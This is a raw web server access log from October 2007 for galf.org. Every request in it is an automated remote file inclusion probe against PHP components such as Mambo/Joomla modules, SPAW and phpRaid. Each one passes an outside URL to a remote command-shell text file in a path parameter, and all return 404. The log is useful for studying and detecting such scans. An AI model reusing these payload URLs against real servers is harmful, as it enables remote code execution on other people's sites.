203.78.110.10 - - [15/Oct/2007:14:32:48 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
209.216.205.186 - - [15/Oct/2007:14:33:00 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://80.33.169.156/solime/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.205.186 - - [15/Oct/2007:14:33:00 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://80.33.169.156/solime/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
203.78.110.10 - - [15/Oct/2007:14:33:07 -0700] "GET /logs/classes/adodbt/sql.php?classes_dir=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
82.85.18.110 - - [15/Oct/2007:14:33:08 -0700] "GET /logs/access_071001.log//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.3.192.124 - - [15/Oct/2007:14:33:11 -0700] "GET /logs/access_071001.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://geocities.com/brondonk_tengah_malam/safe2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
62.75.218.122 - - [15/Oct/2007:14:33:20 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nogrod.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.75.218.122 - - [15/Oct/2007:14:33:20 -0700] "GET /logs/access_070917.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nogrod.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.30.60.158 - - [15/Oct/2007:14:33:26 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [15/Oct/2007:14:33:26 -0700] "GET //administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
66.216.123.11 - - [15/Oct/2007:14:33:32 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.inteligentesite.com.br/arquivos/marajoara/File/cmdtsk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "galf.org"
75.0.141.110 - - [15/Oct/2007:14:33:34 -0700] "GET /logs/access_071001.log//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
66.216.123.11 - - [15/Oct/2007:14:33:37 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.inteligentesite.com.br/arquivos/marajoara/File/cmdtsk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "galf.org"
216.104.47.74 - - [15/Oct/2007:14:33:42 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.47.74 - - [15/Oct/2007:14:33:42 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.47.74 - - [15/Oct/2007:14:33:42 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.2.177.147 - - [15/Oct/2007:14:34:05 -0700] "GET /logs/access_070625.log//phpRaid/rss.php?phpraid_dir=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.216.205.186 - - [15/Oct/2007:14:34:11 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://80.33.169.156/solime/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.205.186 - - [15/Oct/2007:14:34:11 -0700] "GET //modules/xfsection/modify.php?dir_module=http://80.33.169.156/solime/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
71.252.114.2 - - [15/Oct/2007:14:34:20 -0700] "GET /logs/index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
71.252.114.2 - - [15/Oct/2007:14:34:21 -0700] "GET /index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.219.241.2 - - [15/Oct/2007:14:34:35 -0700] "GET /logs/access_070903.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www